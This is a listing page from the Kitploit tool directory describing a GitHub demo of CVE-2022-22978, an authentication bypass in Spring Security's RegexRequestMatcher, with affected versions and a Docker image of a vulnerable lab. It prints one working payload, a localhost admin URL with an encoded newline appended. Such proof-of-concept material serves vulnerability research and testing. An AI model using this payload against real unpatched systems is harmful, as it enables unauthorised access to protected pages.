Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22978 — CVE-2022-22978 Spring-Security bypass Demo | Kitploit
Tools/GitHubGitHub/deepingh0st/cve-2022-22978
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubdeepingh0st/cve-2022-22978

CVE-2022-22978

CVE-2022-22978 Spring-Security bypass Demo

View Repository
1534 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-22978 Spring-Security bypass Demo

When using RegexRequestMatcher in Spring Security and the regex rule contains a dot (.), an attacker can bypass authentication by crafting a malicious packet.

Affected Range

Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4

Reproduction

img.png img_1.png

Paylaod

http://localhost:8080/admin/index%0a

Docker

docker pull s0cke3t/cve-2022-22978:latest

Download Tool